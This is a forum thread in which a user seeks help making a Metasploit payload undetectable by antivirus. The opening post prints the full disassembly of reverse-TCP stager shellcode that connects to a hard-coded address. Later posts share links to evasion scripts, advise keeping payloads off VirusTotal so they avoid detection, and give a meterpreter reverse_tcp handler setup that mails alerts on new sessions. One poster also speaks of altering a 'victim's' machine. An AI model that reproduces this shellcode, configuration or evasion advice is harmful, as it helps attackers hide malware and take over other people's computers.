Results 1 to 12 of 12

Thread: create a payload undetectable

  1. #1
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61

    create a payload undetectable

    i have this assembly code of the payload but i can´t make undetectable
    Code:
    .section '.text' rwx
    .entrypoint
    entrypoint_0:
        cld                                          ; @0  fc  
        call sub_8fh                                 ; @1  e889000000  x:sub_8fh
        pushad                                       ; @6  60  
        mov ebp, esp                                 ; @7  89e5  
        xor edx, edx                                 ; @9  31d2  
        mov edx, fs:[edx+30h]                        ; @0bh  648b5230  r4:segment_base_fs+30h
        mov edx, [edx+0ch]                           ; @0fh  8b520c  r4:unknown
        mov edx, [edx+14h]                           ; @12h  8b5214  r4:unknown
    
    
    // Xrefs: 8dh
    loc_15h:
        mov esi, [edx+28h]                ; @15h  8b7228  r4:unknown
        movzx ecx, word ptr [edx+26h]        ; @18h  0fb74a26  r2:unknown
        mov edi, ecx                ; Move the contents of the ECX register into the EDI Register
        push edi                    ; Push the EDI register onto the current stack frame
        pop edi                    ; Pop it back off
        mov edi, ecx                ; Mov ECX back into edi
        xor ecx, ecx                ; Zero out the contents of the ECX register
        mov ecx, edi                ; Mov EDI back into ECX
        xor edi, edi                ; @1ch  31ff
    
    
    // Xrefs: 2ch
    loc_1eh:
        xor eax, eax                                 ; @1eh  31c0  
        lodsb                                        ; @20h  ac  
        cmp al, 61h                                  ; @21h  3c61  
        jl loc_27h                                   ; @23h  7c02  x:loc_27h
    
        sub al, 20h                                  ; @25h  2c20  
    
    
    // Xrefs: 23h
    loc_27h:
        ror edi, 0dh                                 ; @27h  c1cf0d  
        add edi, eax                                 ; @2ah  01c7  
        loop loc_1eh                                 ; @2ch  e2f0  x:loc_1eh
    
        push edx                                     ; @2eh  52  
        push edi                                     ; @2fh  57  
        mov edx, [edx+10h]                           ; @30h  8b5210  r4:unknown
        mov eax, [edx+3ch]                           ; @33h  8b423c  
        add eax, edx                                 ; @36h  01d0  
        mov eax, [eax+78h]                           ; @38h  8b4078  
        test eax, eax                                ; @3bh  85c0  
        jz loc_89h                                   ; @3dh  744a  x:loc_89h
    
        add eax, edx                                 ; @3fh  01d0  
        push eax                                     ; @41h  50  
        mov ecx, [eax+18h]                           ; @42h  8b4818  
        mov ebx, [eax+20h]                           ; @45h  8b5820  
        add ebx, edx                                 ; @48h  01d3  
    
    
    // Xrefs: 66h
    loc_4ah:
        jecxz loc_88h                                ; @4ah  e33c  x:loc_88h
    
        dec ecx                                      ; @4ch  49  
        mov esi, [ebx+4*ecx]                         ; @4dh  8b348b  
        add esi, edx                                 ; @50h  01d6  
        xor edi, edi                                 ; @52h  31ff  
    
    
    // Xrefs: 5eh
    loc_54h:
        xor eax, eax                                 ; @54h  31c0  
        lodsb                                        ; @56h  ac  
        ror edi, 0dh                                 ; @57h  c1cf0d  
        add edi, eax                                 ; @5ah  01c7  
        cmp al, ah                                   ; @5ch  38e0  
        jnz loc_54h                                  ; @5eh  75f4  x:loc_54h
    
        add edi, [ebp-8]                             ; @60h  037df8  
        cmp edi, [ebp+24h]                           ; @63h  3b7d24  
        jnz loc_4ah                                  ; @66h  75e2  x:loc_4ah
    
        pop eax                                      ; @68h  58  
        mov ebx, [eax+24h]                           ; @69h  8b5824  
        add ebx, edx                                 ; @6ch  01d3  
        mov cx, [ebx+2*ecx]                          ; @6eh  668b0c4b  
        mov ebx, [eax+1ch]                           ; @72h  8b581c  
        add ebx, edx                                 ; @75h  01d3  
        mov eax, [ebx+4*ecx]                         ; @77h  8b048b  
        add eax, edx                                 ; @7ah  01d0  
        mov [esp+24h], eax                           ; @7ch  89442424  
        pop ebx                                      ; @80h  5b  
        pop ebx                                      ; @81h  5b  
        popad                                        ; @82h  61  
        pop ecx                                      ; @83h  59  
        pop edx                                      ; @84h  5a  
        push ecx                                     ; @85h  51  
        jmp eax                                      ; @86h  ffe0  
    
    
    // Xrefs: 4ah
    loc_88h:
        pop eax                                      ; @88h  58  
    
    
    // Xrefs: 3dh
    loc_89h:
        pop edi                                      ; @89h  5f  
        pop edx                                      ; @8ah  5a  
        mov edx, [edx]                               ; @8bh  8b12  r4:unknown
        jmp loc_15h                                  ; @8dh  eb86  x:loc_15h
    
    
    // Xrefs: 1
    sub_8fh:
    // function binding: ebp -> dword ptr [esp], esp -> esp-10h
    // function ends at 0a0h
        pop ebp                                      ; @8fh  5d  
        push 3233h                                   ; @90h  6833320000  
        push 5f327377h                               ; @95h  687773325f  
        push esp                                     ; @9ah  54  
        push 726774ch                                ; @9bh  684c772607  
        call ebp                                     ; @0a0h  ffd5  endsub sub_8fh noreturn
    db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
    db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
    db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 84h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
    db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
    db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
    db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
    db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
    db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
    db 0ech, 0c3h

  2. #2
    Join Date
    2013-Jun
    Posts
    9
    This got past my Eset av/firewall: http://pastebin.com/7xmvGnks
    You may need launch_and_migrate.rb for this one.

    0pt1k

  3. #3
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    i gonna try thanks i gonna see if pass by virustotal
    greate job

  4. #4
    Join Date
    2013-Mar
    Posts
    4
    Don't upload your payloads to VirusTotal! They will get patched...

  5. #5
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    thanks for advice

  6. #6
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    the script you give-me don´t avoid my avast detection in randon number i put like 20000 and the enconding 30 and the avast detect and remove automacly

  7. #7
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    i find this plugin for mfs but i can´t put send the notification for mail mail address
    the code is plugin
    http://pastebin.com/KLU2cYAG
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 9091
    set lhost 192.68.0.2
    set AutoRunScript migrate -n explorer
    load notify_mail
    notify_mail_mailfrom taaaaa@gmail.com
    notify_mail_mailto teeel@gmail.com
    notify_mail_smtpsrv smtp.gmail.com
    notify_mail_smtpport 587
    notify_mail_save
    exploit
    e have the session but is not send-it to gmail account
    Last edited by Lancha; 2013-11-30 at 17:49.

  8. #8
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Lancha View Post
    i find this plugin for mfs but i can´t put send the notification for mail mail address
    the code is plugin
    http://pastebin.com/KLU2cYAG
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 9091
    set lhost 192.68.0.2
    set AutoRunScript migrate -n explorer
    load notify_mail
    notify_mail_mailfrom taaaaa@gmail.com
    notify_mail_mailto teeel@gmail.com
    notify_mail_smtpsrv smtp.gmail.com
    notify_mail_smtpport 587
    notify_mail_save
    exploit
    e have the session but is not send-it to gmail account

    hi lancha
    if this can help:
    the port use 25
    the server smtp use 127.0.0.1 (localhost)

    use a default server MTA in kali EXIM4
    configure your exim4-config AD HOC for gmail
    update-exim4.conf
    start "exim4-server" &&& ......worked fine!

    http://imageshack.us/f/801/mcm2.png/
    http://imageshack.us/f/513/z4cm.png/
    @zoom 1600x1200
    the links to help me for this:
    http://appsparsi.blogspot.it/2011/01...-la-posta.html

    sorry but is in ""italian-language"" try to translate
    bye

  9. #9
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    thanks
    work
    i find the script to change the walpaper of the victiam but when i make load walpaper i have this error
    Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
    the link for script
    http://pastebin.com/yPJqCpRy
    Last edited by Lancha; 2013-12-04 at 15:49.

  10. #10
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Lancha View Post
    thanks
    work
    i find the script to change the walpaper of the victiam but when i make load walpaper i have this error
    Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
    the link for script
    http://pastebin.com/yPJqCpRy
    hi lancha
    maybe we're off topic
    however:
    the old & dear wallpaper.rb is a ""Meterpreter-script"" then be copied on /opt/metasploit/apps/pro/msf3/scripts/meterpreter/ directory
    &&
    the ""wallpaper-background".bmp(es:metasploit.bmp) then be copied on /opt/metasploit/apps/pro/msf3/data/ directory
    ....seems to worked fine!!
    http://imageshack.us/f/19/g8qs.png/
    http://imageshack.us/f/41/ju9z.png/
    @zoom 1600x1200
    bye

  11. #11
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    thanks for the help
    Last edited by Lancha; 2013-12-05 at 18:27.

  12. #12
    Join Date
    2013-Mar
    Location
    unknown
    Posts
    61
    my avast detect the payload with launch_and_migrate.rb
    can someone help-me
    i using avast last version
    with windows xp SP3

Similar Threads

  1. How can I create a persistence payload over WAN
    By TitoOP in forum General Archive
    Replies: 1
    Last Post: 2016-10-18, 15:58
  2. setoolkit - Create Payload and Listener Option fails
    By daves in forum General Archive
    Replies: 7
    Last Post: 2013-11-01, 14:44

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •